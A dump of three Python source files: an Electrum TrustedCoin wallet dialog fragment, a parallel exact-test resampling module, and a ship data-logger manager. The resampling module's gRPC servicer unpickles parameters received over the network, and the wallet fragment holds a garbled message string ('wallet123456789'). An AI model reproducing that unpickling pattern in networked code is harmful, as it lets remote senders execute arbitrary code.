_("Your wallet123456789 file is : {}.").format(os.path.abspath(wizard.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.reset_stack()
try:
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('accept_terms_of_use'))
except GoBack:
# user clicked 'Cancel' and decided to move wallet file manually
wizard.create_storage(wizard.path)
raise
def show_settings_dialog(self, window, success):
if not success:
window.show_message(_('Server not reachable.'))
return
wallet = window.wallet
d = WindowModalDialog(window, _("TrustedCoin Information"))
d.setMinimumSize(500, 200)
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("tc.jpeg")))
msg = _('This wallet is protected by TrustedCoin\'s two-factor authentication.') + '<br/>' \
+ _(
"For more information, visit") + " <a href=\"https://api.trustedcoin.com/#/electrum-help\">https://api.trustedcoin.com/#/electrum-help</a>"
label = QLabel(msg)
label.setOpenExternalLinks(1)
hbox.addStretch(10)
hbox.addWidget(logo)
hbox.addStretch(10)
hbox.addWidget(label)
hbox.addStretch(10)
vbox.addLayout(hbox)
vbox.addStretch(10)
msg = _(
'TrustedCoin charges a small fee to co-sign transactions. The fee depends on how many prepaid transactions you buy. An extra output is added to your transaction every time you run out of prepaid transactions.') + '<br/>'
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addStretch(10)
grid = QGridLayout()
vbox.addLayout(grid)
price_per_tx = wallet.price_per_tx
n_prepay = wallet.num_prepay(self.config)
i = 0
for k, v in sorted(price_per_tx.items()):
if k == 1:
continue
grid.addWidget(QLabel("Pay every %d transactions:" % k), i, 0)
grid.addWidget(QLabel(window.format_amount(v / k) + ' ' + window.base_unit() + "/tx"), i, 1)
b = QRadioButton()
b.setChecked(k == n_prepay)
b.clicked.connect(lambda b, k=k: self.config.set_key('trustedcoin_prepay', k, True))
grid.addWidget(b, i, 2)
i += 1
n = wallet.billing_info.get('tx_remaining', 0)
grid.addWidget(QLabel(_("Your wallet has {} prepaid transactions.").format(n)), i, 0)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
|
exact_test_sampler.py
|
import attr
import cffi
from collections import defaultdict, namedtuple
import itertools
from multiprocessing.pool import Pool
import pickle
import queue
import random
import os
import secrets
import threading
import time
from cffi_util import read_stripped_header
# Don't force a dependency on gRPC just for testing.
try:
from exact_test_sampler_client import get_sampler_servers
from exact_test_sampler_pb2 import AnalysisRequest, ResultSet, StatusRequest
from exact_test_sampler_pb2_grpc import ExactTestSamplerServicer
except:
print("Defaulting dummy gRPC/proto definitions in exact_test_sampler.py")
def get_sampler_servers(local_stub):
return [local_stub], True
@attr.s
class RawData:
a_values = attr.ib(factory=list)
b_values = attr.ib(factory=list)
@attr.s
class AnalysisRequest:
raw_data = attr.ib(factory=RawData)
parameters = attr.ib(factory=bytes)
@attr.s
class ResultSet:
@attr.s
class StatisticValues:
name = attr.ib(factory=str)
values = attr.ib(factory=list)
results = attr.ib(factory=list)
def SerializeToString(self):
"""We don't really serialise."""
return self
def ParseFromString(self, value):
self.results = value.results
@attr.s
class StatusRequest:
pass
class ExactTestSamplerServicer:
pass
SELF_DIR = os.path.dirname(os.path.abspath(__file__))
TOPLEVEL = os.path.abspath(SELF_DIR + "/../") + "/"
FFI = cffi.FFI()
EXACT_HEADERS = ["bench/exact_test.h"]
for header in EXACT_HEADERS:
FFI.cdef(read_stripped_header(TOPLEVEL + header))
try:
EXACT = FFI.dlopen(TOPLEVEL + "/exact.so")
except Exception as e:
print("Failed to load exact.so: %s" % e)
EXACT = None
Sample = namedtuple("Sample", ["a_class", "b_class"])
# A statistic has a name, and is defined by the preprocessing for the
# data under the null (the probability that a value from A is lower than
# one from B [likely not quite what one expects], and offsets to add
# to the u63 values for A and B), by the C statistic computation
# function, and by any additional arguments for that function.
Statistic = namedtuple(
"Statistic",
["name", "probability_a_lower", "a_offset", "b_offset", "fn_name", "fn_args"],
)
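# Illustrative construction of a Statistic (the values here are hypothetical;
# fn_name must match a statistic function exported by exact.so, and fn_args
# are forwarded to it after the sorted buffer and the two sample sizes):
#
#     Statistic(name="mean_diff", probability_a_lower=0.5,
#               a_offset=0, b_offset=0,
#               fn_name="exact_test_mean_diff", fn_args=())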
def actual_data_results(sample, statistics):
"""Computes the actual sample value for all `statistics`, for the
sample values in `sample.a_class` and `sample.b_class`.
"""
a = sample.a_class
b = sample.b_class
def _make_buf():
buf = FFI.new("uint64_t[]", len(a) + len(b))
for i, x in enumerate(a + b):
buf[i] = x
return buf
results = dict()
m = len(a)
n = len(b)
buf = _make_buf()
total = m + n
copy = FFI.new("uint64_t[]", total)
FFI.memmove(copy, buf, total * FFI.sizeof("uint64_t"))
xoshiro = EXACT.exact_test_prng_create()
EXACT.exact_test_offset_sort(xoshiro, copy, m, n, 0, 0)
EXACT.exact_test_prng_destroy(xoshiro)
for stat in statistics:
value = getattr(EXACT, stat.fn_name)(copy, m, n, *stat.fn_args)
results[stat.name] = value
return results
def _resampled_data_results_1(sample, grouped_statistics):
"""Yields values for all the statistics in `grouped_statistics` after
shuffling values from `sample.a_class` and `sample.b_class`.
"""
# Reseed to avoid exploring the same random sequence multiple
# times when multiprocessing.
EXACT.exact_test_prng_seed(secrets.randbits(64))
a = sample.a_class
b = sample.b_class
def _make_buf():
buf = FFI.new("uint64_t[]", len(a) + len(b))
for i, x in enumerate(a + b):
buf[i] = x
return buf
m = len(a)
n = len(b)
buf = _make_buf()
total = m + n
shuffled_buf = FFI.new("uint64_t[]", total)
sorted_buf = FFI.new("uint64_t[]", total)
error_ptr = FFI.new("char**")
xoshiro = EXACT.exact_test_prng_create()
def compute_results():
results = dict()
for p_a_lt, stats_for_p in grouped_statistics.items():
FFI.memmove(shuffled_buf, buf, total * FFI.sizeof("uint64_t"))
if not EXACT.exact_test_shuffle(
xoshiro, shuffled_buf, m, n, p_a_lt, error_ptr
):
raise Exception(
"Shuffle failed: %s" % str(FFI.string(error_ptr[0]), "utf-8")
)
for (a_offset, b_offset), stats_for_offset in stats_for_p.items():
FFI.memmove(sorted_buf, shuffled_buf, total * FFI.sizeof("uint64_t"))
EXACT.exact_test_offset_sort(
xoshiro, sorted_buf, m, n, a_offset, b_offset
)
for stat in stats_for_offset:
results[stat.name] = getattr(EXACT, stat.fn_name)(
sorted_buf, m, n, *stat.fn_args
)
return results
try:
while True:
yield compute_results()
finally:
EXACT.exact_test_prng_destroy(xoshiro)
def _convert_result_arrays_to_proto(dict_of_arrays):
ret = ResultSet()
for name, values in dict_of_arrays.items():
proto = ResultSet.StatisticValues()
proto.statistic_name = name
proto.values[:] = values
ret.results.append(proto)
return ret
def _convert_proto_to_result_dicts(result_set):
max_length = max(len(stats.values) for stats in result_set.results)
dicts = [dict() for _ in range(max_length)]
for stats in result_set.results:
name = stats.statistic_name
for i, value in enumerate(stats.values):
dicts[i][name] = value
return dicts
def _generate_in_parallel_worker(generator_fn, generator_args, max_results, max_delay):
"""Toplevel worker for a process pool. Batches values yielded by
`generator_fn(*generator_args)` until we have too many values, or
we hit `max_delay`, and then return that list of values, converted
to a ResultSet.
We apply some jitter to both `max_results` and `max_delay` to avoid
lock-step synchronisation and the resulting thundering-herd issues.
"""
max_results = 1 + int(max_results * (0.5 + random.random()))
max_delay *= 0.5 + random.random()
results = defaultdict(list)
end = time.monotonic() + max_delay
for i, value in enumerate(generator_fn(*generator_args)):
for k, v in value.items():
results[k].append(v)
if i >= max_results or time.monotonic() >= end:
return _convert_result_arrays_to_proto(results)
# At first, return as soon as we have INITIAL_BATCH_SIZE results
INITIAL_BATCH_SIZE = 10
# And let that limit grow up to MAX_BATCH_SIZE
MAX_BATCH_SIZE = 100 * 1000
# Growth rate for the batch size
BATCH_SIZE_GROWTH_FACTOR = 2
# We wait for up to this fraction of the total computation runtime
# before returning values
PROPORTIONAL_DELAY = 0.05
# Wait for at least MIN_DELAY seconds before returning the values we have
MIN_DELAY = 0.05
# And wait for up to MAX_DELAY seconds before returning.
MAX_DELAY = 10
# We lazily create a pool of POOL_SIZE workers.
POOL_SIZE = max(1, os.cpu_count() - 1)
POOL_LOCK = threading.Lock()
POOL = None
# Backoff parameters when polling for updates in _generate_in_parallel.
POLL_PROPORTIONAL_DELAY = 0.5
POLL_MIN_DELAY = 0.01
POLL_MAX_DELAY = 1.0
def _init_worker():
os.nice(20)
def ensure_pool(pool_size=POOL_SIZE):
"""Returns the global process pool, after creating it if necessary.
If a new pool must be created, it will have `pool_size` worker
processes.
"""
global POOL
with POOL_LOCK:
if POOL is None:
POOL = Pool(pool_size, _init_worker, initargs=(), maxtasksperchild=100)
return POOL
def _generate_in_parallel(generator_fn, generator_args_fn, stop_event=None):
"""Yields values returned by parallel calls to
`generator_fn(*generator_args_fn())` in arbitrary order.
If `stop_event` is provided, returns when `stop_event.is_set()`.
"""
# We want multiprocessing to avoid the GIL. We use relatively
# coarse-grained futures (instead of a managed queue) to simplify
# the transition to RPCs.
if stop_event is None:
stop_event = threading.Event()
# We queue up futures, with up to `max_waiting` not yet running.
max_waiting = 2
pending = []
begin = time.monotonic()
batch_size = INITIAL_BATCH_SIZE
pool = ensure_pool()
def backoff(last_change):
elapsed = time.monotonic() - last_change
delay = POLL_PROPORTIONAL_DELAY * elapsed
if delay < POLL_MIN_DELAY:
delay = POLL_MIN_DELAY
if delay > POLL_MAX_DELAY:
delay = POLL_MAX_DELAY
stop_event.wait(delay)
def consume_completed_futures():
active = []
completed = []
for future in pending:
if future.ready():
completed.append(future)
else:
active.append(future)
pending.clear()
pending.extend(active)
return [future.get(0) for future in completed]
# Adds a new work unit to the pending list.
def add_work_unit():
delay = PROPORTIONAL_DELAY * (time.monotonic() - begin)
if delay < MIN_DELAY:
delay = MIN_DELAY
if delay > MAX_DELAY:
delay = MAX_DELAY
future_results = pool.apply_async(
_generate_in_parallel_worker,
(generator_fn, generator_args_fn(), batch_size, delay),
)
pending.append(future_results)
def fill_pending_list():
any_change = False
for _ in range(POOL_SIZE + max_waiting):
# Yeah, we're using internals, but this one hasn't
# changed since 3.5 (or earlier), and I don't know why
# this value isn't exposed.
if pool._taskqueue.qsize() >= max_waiting:
break
add_work_unit()
any_change = True
return any_change
fill_pending_list()
last_activity = begin
while not stop_event.is_set():
any_completed = False
for completed in consume_completed_futures():
yield completed
any_completed = True
if any_completed:
batch_size = min(BATCH_SIZE_GROWTH_FACTOR * batch_size, MAX_BATCH_SIZE)
any_change = fill_pending_list()
if any_completed or any_change:
last_activity = time.monotonic()
else:
backoff(last_activity)
@attr.s
class ExactTestParameters:
# Signaled when the request should be exited
done = attr.ib(factory=threading.Event)
# Signaled when sample and params are both populated...
# or when the request should be exited, since it's so
# hard to wait on two events.
ready = attr.ib(factory=threading.Event)
lock = attr.ib(factory=threading.Lock)
sample = attr.ib(default=None)
params = attr.ib(default=None)
class ExactTestSampler(ExactTestSamplerServicer):
# How long to wait for a_values, b_values, and params.
INITIAL_DATA_TIMEOUT = 60
@staticmethod
def _update_test_params(params, update_requests, ctx):
try:
for analysis_request in update_requests:
if ctx and not ctx.is_active():
break
with params.lock:
if (
analysis_request.raw_data.a_values
or analysis_request.raw_data.b_values
):
params.sample = Sample(
a_class=list(analysis_request.raw_data.a_values),
b_class=list(analysis_request.raw_data.b_values),
)
if analysis_request.parameters:
params.params = pickle.loads(analysis_request.parameters)
if params.sample is not None and params.params is not None:
params.ready.set()
finally:
params.done.set()
params.ready.set()
def status(self, request, context):
return StatusRequest()
def simulate(self, requests, ctx):
"""Requests is an iterator of AnalysisRequest. This method yields
arrays of analysis values, and is not yet a full-blown Servicer
implementation.
"""
params = ExactTestParameters()
updater = None
def read_params():
with params.lock:
return (params.sample, params.params)
def mark_cancelled():
params.done.set()
params.ready.set()
if ctx is not None:
ctx.add_callback(mark_cancelled)
try:
updater = threading.Thread(
target=self._update_test_params,
args=(params, requests, ctx),
daemon=True,
)
updater.start()
if not params.ready.wait(timeout=self.INITIAL_DATA_TIMEOUT):
return
if params.done.is_set():
return
for value in _generate_in_parallel(
_resampled_data_results_1, read_params, params.done
):
if params.done.is_set():
break
yield value
if params.done.is_set():
break
finally:
params.done.set()
params.ready.set()
if updater is not None and updater.is_alive():
updater.join(0.001)
class BufferedIterator:
"""Exposes a queue-like interface for a array of arbitrary iterator.
Works by internally spinning up a reader thread.
"""
BUFFER_SIZE = 4
def __init__(self, iterators, block_on_exit=True):
self.iterators = iterators
self.queue = queue.Queue(self.BUFFER_SIZE + 2 * len(self.iterators))
self.done = threading.Event()
self.workers = None
self.block_on_exit = block_on_exit
def is_done(self):
return self.done.is_set() or not self.workers or not any(worker.is_alive() for worker in self.workers)
# get and get_nowait may return None to denote the end of the iterators.
def get(self, block=True, timeout=None):
return self.queue.get(block, timeout)
def get_nowait(self):
return self.queue.get_nowait()
def _pull_from_iterator(self, iterator):
for value in iterator:
if self.done.is_set():
break
self.queue.put(value)
if self.done.is_set():
break
# Make sure the reader wakes up. If the queue is full, the
# reader should soon grab an item and notice that the queue is
# done.
self.done.set()
try:
self.queue.put_nowait(None)
except queue.Full:
pass
def __enter__(self):
self.done.clear()
self.workers = []
for iterator in self.iterators:
worker = threading.Thread(target=self._pull_from_iterator, args=(iterator,))
worker.start()
self.workers.append(worker)
return self
def __exit__(self, *_):
self.done.set()
try:
# Make sure there's a value in the queue.
self.queue.put_nowait(None)
except queue.Full:
pass
for worker in self.workers:
try:
for _ in self.workers:
self.queue.get_nowait()
except queue.Empty:
pass
worker.join(None if self.block_on_exit else 0)
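# Sketch of how BufferedIterator is used below in resampled_data_results: it
# fans several generators into one queue so the caller can poll all of them
# without blocking on any single one. The generators here are placeholders.
#
#     with BufferedIterator([gen_a, gen_b], block_on_exit=False) as buf:
#         try:
#             value = buf.get(block=False)   # raises queue.Empty if nothing yet
#         except queue.Empty:
#             pass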
def resampled_data_results(sample, grouped_statistics_queue, inline_eval=None):
"""Yields values computed by the `Statistics` returned by
`grouped_statistics_queue.get()` after reshuffling values from
`sample.a_class` and `sample.b_class`.
"""
request_queues = []
cached_stats = [None]
def grouped_statistics_fn(block=False):
try:
cached_stats[0] = grouped_statistics_queue.get(block=block)
req = AnalysisRequest()
req.parameters = pickle.dumps(cached_stats[0])
for reqqueue in request_queues:
reqqueue.put(req)
except queue.Empty:
pass
return cached_stats[0]
def serial_generator():
"""Calls the generator fn to get new values, while regenerating the
arguments from time to time.
"""
current_stats = grouped_statistics_fn()
while True:
for value in _resampled_data_results_1(sample, current_stats):
yield value
new_stats = grouped_statistics_fn()
if current_stats is not new_stats:
current_stats = new_stats
break
try:
samplers, config_inline_eval = get_sampler_servers(ExactTestSampler())
if inline_eval is None:
inline_eval = config_inline_eval
initial_req = AnalysisRequest()
initial_req.raw_data.a_values[:] = sample.a_class
initial_req.raw_data.b_values[:] = sample.b_class
for _ in samplers:
request_queues.append(queue.SimpleQueue())
request_queues[-1].put(initial_req)
# Make sure we have an initial value for the analysis parameters.
grouped_statistics_fn(block=True)
parallel_generators = [
sampler.simulate(iter(queue.get, None), None)
for sampler, queue in zip(samplers, request_queues)
]
with BufferedIterator(parallel_generators, block_on_exit=False) as buf:
try:
inline_values = (
serial_generator() if inline_eval else itertools.repeat(None)
)
for value in inline_values:
if inline_eval:
yield value
try:
while True:
# If inline_eval is disabled, we only
# yield values received through `buf`.
# We should block.
par_value = buf.get(block=not inline_eval)
if par_value is None:
return
for value in _convert_proto_to_result_dicts(par_value):
yield value
# Try and update the config.
grouped_statistics_fn()
except queue.Empty:
pass
finally:
for reqqueue in request_queues:
reqqueue.put(None)
finally:
# Mark the end of the request iterator.
for reqqueue in request_queues:
reqqueue.put(None)
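# A minimal driving sketch for resampled_data_results(), assuming a picklable
# Statistics-like object: feed an initial statistics value through a queue and
# iterate until enough resampled results have been collected. `sample` and
# `make_statistics` are hypothetical stand-ins for the caller's sample
# container and Statistics factory; they are not defined in this module.
def _resampled_data_results_sketch(sample, make_statistics, max_results=100):
    stats_queue = queue.SimpleQueue()
    stats_queue.put(make_statistics())  # initial analysis parameters
    results = []
    for result in resampled_data_results(sample, stats_queue):
        results.append(result)
        if len(results) >= max_results:
            # The generator runs until the caller stops iterating.
            break
    return results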
|
logger_manager.py
|
#! /usr/bin/env python3
"""
"""
import datetime
import getpass # to get username
import logging
import multiprocessing
import os
import signal
import socket # to get hostname
import sys
import threading
import time
from importlib import reload
from os.path import dirname, realpath
# Add the openrvdas components onto sys.path
sys.path.append(dirname(dirname(realpath(__file__))))
# Imports for running CachedDataServer
from server.cached_data_server import CachedDataServer # noqa: E402
from server.logger_supervisor import LoggerSupervisor # noqa: E402
from server.server_api import ServerAPI # noqa: E402
from logger.transforms.to_das_record_transform import ToDASRecordTransform # noqa: E402
from logger.utils.stderr_logging import DEFAULT_LOGGING_FORMAT # noqa: E402
from logger.utils.stderr_logging import StdErrLoggingHandler # noqa: E402
from logger.utils.read_config import read_config # noqa: E402
# For sending stderr to CachedDataServer
from logger.utils.das_record import DASRecord # noqa: E402
from logger.writers.cached_data_writer import CachedDataWriter # noqa: E402
from logger.writers.composed_writer import ComposedWriter # noqa: E402
DEFAULT_MAX_TRIES = 3
SOURCE_NAME = 'LoggerManager'
USER = getpass.getuser()
HOSTNAME = socket.gethostname()
DEFAULT_DATA_SERVER_WEBSOCKET = 'localhost:8766'
############################
def kill_handler(self, signum):
"""Translate an external signal (such as we'd get from os.kill) into a
KeyboardInterrupt, which will signal the start() loop to exit nicely."""
raise KeyboardInterrupt('Received external kill signal')
################################################################################
################################################################################
class LoggerManager:
############################
def __init__(self,
api, supervisor, data_server_websocket=None,
stderr_file_pattern='/var/log/openrvdas/{logger}.stderr',
interval=0.25, log_level=logging.INFO, logger_log_level=logging.WARNING):
"""Read desired/current logger configs from Django DB and try to run the
loggers specified in those configs.
```
api - ServerAPI (or subclass) instance by which LoggerManager will get
its data store updates
supervisor - a LoggerSupervisor object to use to manage logger
processes.
data_server_websocket - cached data server host:port to which we are
going to send our status updates.
stderr_file_pattern - Pattern into which logger name will be
interpolated to create the file path/name to which the
logger's stderr will be written. E.g.
'/var/log/openrvdas/{logger}.stderr' If
data_server_websocket is defined, will write logger
stderr to it.
interval - number of seconds to sleep between checking/updating loggers
log_level - LoggerManager's log level
logger_log_level - At what logging level our component loggers
should operate.
```
"""
# Set signal to catch SIGTERM and convert it into a
# KeyboardInterrupt so we can shut things down gracefully.
try:
signal.signal(signal.SIGTERM, kill_handler)
except ValueError:
logging.warning('LoggerManager not running in main thread; '
'shutting down with Ctrl-C may not work.')
# api class must be subclass of ServerAPI
if not issubclass(type(api), ServerAPI):
raise ValueError('Passed api "%s" must be subclass of ServerAPI' % api)
self.api = api
self.supervisor = supervisor
# Data server to which we're going to send status updates
if data_server_websocket:
self.data_server_writer = CachedDataWriter(data_server_websocket)
else:
self.data_server_writer = None
self.stderr_file_pattern = stderr_file_pattern
self.interval = interval
self.logger_log_level = logger_log_level
# Try to set up logging, right off the bat: reset logging to its
# freshly-imported state and add handler that also sends logged
# messages to the cached data server.
reload(logging)
logging.basicConfig(format=DEFAULT_LOGGING_FORMAT, level=log_level)
if self.data_server_writer:
cds_writer = ComposedWriter(
transforms=ToDASRecordTransform(data_id='stderr',
field_name='stderr:logger_manager'),
writers=self.data_server_writer)
logging.getLogger().addHandler(StdErrLoggingHandler(cds_writer))
# How our various loops and threads will know it's time to quit
self.quit_flag = False
# Where we store the latest cruise definition and status reports.
self.cruise = None
self.cruise_filename = None
self.cruise_loaded_time = 0
self.loggers = {}
self.config_to_logger = {}
self.logger_status = None
self.status_time = 0
# We loop to check the logger status and pass it off to the cached
# data server. Do this in a separate thread.
self.check_logger_status_thread = None
# We'll loop to check the API for updates to our desired
# configs. Do this in a separate thread. Also keep track of
# currently active configs so that we know when an update is
# actually needed.
self.update_configs_thread = None
self.config_lock = threading.Lock()
self.active_mode = None # which mode is active now?
self.active_configs = None # which configs are active now?
############################
def start(self):
"""Start the threads that make up the LoggerManager operation:
1. Configuration update loop
2. Loop to read logger stderr/status and either output it or
transmit it to a cached data server
Start threads as daemons so that they'll automatically terminate
if the main thread does.
"""
logging.info('Starting LoggerManager')
# Check logger status in a separate thread. If we've got the
# address of a data server websocket, send our updates to it.
self.check_logger_status_loop_thread = threading.Thread(
name='check_logger_status_loop',
target=self._check_logger_status_loop, daemon=True)
self.check_logger_status_loop_thread.start()
# Update configs in a separate thread.
self.update_configs_thread = threading.Thread(
name='update_configs_loop',
target=self._update_configs_loop, daemon=True)
self.update_configs_thread.start()
# Send the cruise definition to the cached data server in a separate
# thread so that the console can pick up any changes.
self.send_cruise_definition_loop_thread = threading.Thread(
name='send_cruise_definition_loop',
target=self._send_cruise_definition_loop, daemon=True)
self.send_cruise_definition_loop_thread.start()
############################
def quit(self):
"""Exit the loop and shut down all loggers."""
self.quit_flag = True
############################
def _load_new_definition_from_api(self):
"""Fetch a new cruise definition from API and build local maps. Then
send an updated cruise definition to the console.
"""
logging.info('Fetching new cruise definitions from API')
try:
with self.config_lock:
self.loggers = self.api.get_loggers()
self.config_to_logger = {}
for logger, logger_configs in self.loggers.items():
# Map config_name->logger
for config in self.loggers[logger].get('configs', []):
self.config_to_logger[config] = logger
# This is a redundant grab of data when we're called from
# _send_cruise_definition_loop(), but we may also be called
# from a callback when the API alerts us that something has
# changed. So we need to re-grab self.cruise
self.cruise = self.api.get_configuration() # a Cruise object
self.cruise_filename = self.cruise.get('config_filename', None)
loaded_time = self.cruise.get('loaded_time')
self.cruise_loaded_time = datetime.datetime.timestamp(loaded_time)
self.active_mode = self.api.get_active_mode()
# Send updated cruise definition to CDS for console to read.
cruise_dict = {
'cruise_id': self.cruise.get('id', ''),
'filename': self.cruise_filename,
'config_timestamp': self.cruise_loaded_time,
'loggers': self.loggers,
'modes': self.cruise.get('modes', {}),
'active_mode': self.active_mode,
}
logging.info('Sending updated cruise definitions to CDS.')
self._write_record_to_data_server(
'status:cruise_definition', cruise_dict)
except (AttributeError, ValueError, TypeError) as e:
logging.info('Failed to update cruise definition: %s', e)
############################
def _check_logger_status_loop(self):
"""Grab logger status message from supervisor and send to cached data
server via websocket. Also send cruise mode as separate message.
"""
while not self.quit_flag:
now = time.time()
try:
config_status = self.supervisor.get_status()
with self.config_lock:
# Stash status, note time and send update
self.config_status = config_status
self.status_time = now
self._write_record_to_data_server('status:logger_status', config_status)
# Now get and send cruise mode
mode_map = {'active_mode': self.api.get_active_mode()}
self._write_record_to_data_server('status:cruise_mode', mode_map)
except ValueError as e:
logging.warning('Error while trying to send logger status: %s', e)
time.sleep(self.interval)
############################
def _update_configs_loop(self):
"""Iteratively check the API for updated configs and send them to the
appropriate LoggerRunners.
"""
while not self.quit_flag:
self._update_configs()
time.sleep(self.interval)
############################
def _update_configs(self):
"""Get list of new (latest) configs. Send to logger supervisor to make
any necessary changes.
Note: we can't fold this into _update_configs_loop() because we may
need to ask the api to call it independently as a callback when it
notices that the config has changed. Search for the line:
api.on_update(callback=logger_manager._update_configs)
in this file to see where.
"""
# First, grab a status update.
# self.logger_status = self.supervisor.check_status()
# self.status_time = time.time()
with self.config_lock:
# Get new configs in dict {logger:{'configs':[config_name,...]}}
logger_configs = self.api.get_logger_configs()
if logger_configs:
self.supervisor.update_configs(logger_configs)
self.active_configs = logger_configs
############################
def _send_cruise_definition_loop(self):
"""Iteratively assemble information from DB about what loggers should
exist and what states they *should* be in. We'll send this to the
cached data server whenever it changes (or if it's been a while
since we have).
Also, if the logger or config names have changed, signal that we
need to create a new config file for the supervisord process to
use.
Looks like:
{'active_mode': 'log',
'cruise_id': 'NBP1406',
'loggers': {'PCOD': {'active': 'PCOD->file/net',
'configs': ['PCOD->off',
'PCOD->net',
'PCOD->file/net',
'PCOD->file/net/db']},
next_logger: next_configs,
...
},
'modes': ['off', 'monitor', 'log', 'log+db']
}
"""
last_loaded_timestamp = 0
while not self.quit_flag:
try:
self.cruise = self.api.get_configuration() # a Cruise object
if not self.cruise:
logging.info('No cruise definition found in API')
time.sleep(self.interval * 2)
continue
self.cruise_filename = self.cruise.get('config_filename', None)
loaded_time = self.cruise.get('loaded_time')
self.cruise_loaded_time = datetime.datetime.timestamp(loaded_time)
# Has cruise definition file changed since we loaded it? If so,
# send a notification to console so it can ask if user wants to
# reload.
if self.cruise_filename:
try:
mtime = os.path.getmtime(self.cruise_filename)
if mtime > self.cruise_loaded_time:
logging.debug('Cruise file timestamp changed!')
self._write_record_to_data_server('status:file_update', mtime)
except FileNotFoundError:
logging.debug('Cruise file "%s" has disappeared?', self.cruise_filename)
# Does database have a cruise definition with a newer timestamp?
# Means user loaded/reloaded definition. Update our maps to
# reflect the new values and send an updated cruise_definition
# to the console.
if self.cruise_loaded_time > last_loaded_timestamp:
last_loaded_timestamp = self.cruise_loaded_time
logging.info('New cruise definition detected - rebuilding maps.')
self._load_new_definition_from_api()
except KeyboardInterrupt: # (AttributeError, ValueError, TypeError):
logging.warning('No cruise definition found in API')
# Whether or not we've sent an update, sleep
time.sleep(self.interval * 2)
############################
def _write_record_to_data_server(self, field_name, record):
"""Format and label a record and send it to the cached data server.
"""
if self.data_server_writer:
das_record = DASRecord(fields={field_name: record})
logging.debug('DASRecord: %s' % das_record)
self.data_server_writer.write(das_record)
else:
logging.info('Update: %s: %s', field_name, record)
################################################################################
def run_data_server(data_server_websocket,
data_server_back_seconds, data_server_cleanup_interval,
data_server_interval):
"""Run a CachedDataServer (to be called as a separate process),
accepting websocket connections to receive data to be cached and
served.
"""
# First get the port that we're going to run the data server on. Because
# we're running it locally, it should only have a port, not a hostname.
# We should try to handle it if they prefix with a ':', though.
data_server_websocket = data_server_websocket or DEFAULT_DATA_SERVER_WEBSOCKET
websocket_port = int(data_server_websocket.split(':')[-1])
server = CachedDataServer(port=websocket_port, interval=data_server_interval)
# The server will start serving in its own thread after
# initialization, but we need to manually fire up the cleanup loop
# if we want it. Maybe we should have this also run automatically in
# its own thread after initialization?
server.cleanup_loop()
################################################################################
if __name__ == '__main__': # noqa: C901
import argparse
import atexit
import readline
from server.server_api_command_line import ServerAPICommandLine
parser = argparse.ArgumentParser()
parser.add_argument('--config', dest='config', action='store',
help='Name of configuration file to load.')
parser.add_argument('--mode', dest='mode', action='store', default=None,
help='Optional name of mode to start system in.')
parser.add_argument('--database', dest='database', action='store',
choices=['memory', 'django'],
default='memory', help='What backing store database '
'to use.')
parser.add_argument('--stderr_file_pattern', dest='stderr_file_pattern',
default='/var/log/openrvdas/{logger}.stderr',
help='Pattern into which logger name will be '
'interpolated to create the file path/name to which '
'the logger\'s stderr will be written. E.g. '
'\'/var/log/openrvdas/{logger}.stderr\'')
# Arguments for cached data server
parser.add_argument('--data_server_websocket', dest='data_server_websocket',
action='store', default=None,
help='Address at which to connect to cached data server '
'to send status updates.')
parser.add_argument('--start_data_server', dest='start_data_server',
action='store_true', default=False,
help='Whether to start our own cached data server.')
parser.add_argument('--data_server_back_seconds',
dest='data_server_back_seconds', action='store',
type=float, default=480,
help='Maximum number of seconds of old data to keep '
'for serving to new clients.')
parser.add_argument('--data_server_cleanup_interval',
dest='data_server_cleanup_interval',
action='store', type=float, default=60,
help='How often to clean old data out of the cache.')
parser.add_argument('--data_server_interval', dest='data_server_interval',
action='store', type=float, default=1,
help='How many seconds to sleep between successive '
'sends of data to clients.')
parser.add_argument('--interval', dest='interval', action='store',
type=float, default=0.5,
help='How many seconds to sleep between logger checks.')
parser.add_argument('--max_tries', dest='max_tries', action='store', type=int,
default=DEFAULT_MAX_TRIES,
help='Number of times to retry failed loggers.')
parser.add_argument('--no-console', dest='no_console', default=False,
action='store_true', help='Run without a console '
'that reads commands from stdin.')
parser.add_argument('-v', '--verbosity', dest='verbosity',
default=0, action='count',
help='Increase output verbosity')
parser.add_argument('-V', '--logger_verbosity', dest='logger_verbosity',
default=0, action='count',
help='Increase output verbosity of component loggers')
args = parser.parse_args()
# Set up logging first of all
LOG_LEVELS = {0: logging.WARNING, 1: logging.INFO, 2: logging.DEBUG}
log_level = LOG_LEVELS[min(args.verbosity, max(LOG_LEVELS))]
logging.basicConfig(format=DEFAULT_LOGGING_FORMAT, level=log_level)
# What level do we want our component loggers to write?
logger_log_level = LOG_LEVELS[min(args.logger_verbosity, max(LOG_LEVELS))]
############################
# First off, start any servers we're supposed to be running
logging.info('Preparing to start LoggerManager.')
# If we're supposed to be running our own CachedDataServer, start it
# here in its own daemon process (daemon so that it dies when we exit).
if args.start_data_server:
data_server_proc = multiprocessing.Process(
name='openrvdas_data_server',
target=run_data_server,
args=(args.data_server_websocket,
args.data_server_back_seconds, args.data_server_cleanup_interval,
args.data_server_interval),
daemon=True)
data_server_proc.start()
############################
# If we do have a data server, add a handler that will echo all
# logger_manager stderr output to it
if args.data_server_websocket:
stderr_writer = ComposedWriter(
transforms=ToDASRecordTransform(field_name='stderr:logger_manager'),
writers=[CachedDataWriter(data_server=args.data_server_websocket)])
logging.getLogger().addHandler(StdErrLoggingHandler(stderr_writer,
parse_to_json=True))
############################
# Instantiate API - are we using an in-memory store or Django
# database as our backing store? Do our imports conditionally, so
# they don't actually have to have Django if they're not using it.
if args.database == 'django':
from django_gui.django_server_api import DjangoServerAPI
api = DjangoServerAPI()
elif args.database == 'memory':
from server.in_memory_server_api import InMemoryServerAPI
api = InMemoryServerAPI()
else:
raise ValueError('Illegal arg for --database: "%s"' % args.database)
# Now that API is defined, tack on one more logging handler: one
# that passes messages to API.
# TODO: decide if we even need this. Disabled for now
# logging.getLogger().addHandler(WriteToAPILoggingHandler(api))
############################
# Create our logger supervisor.
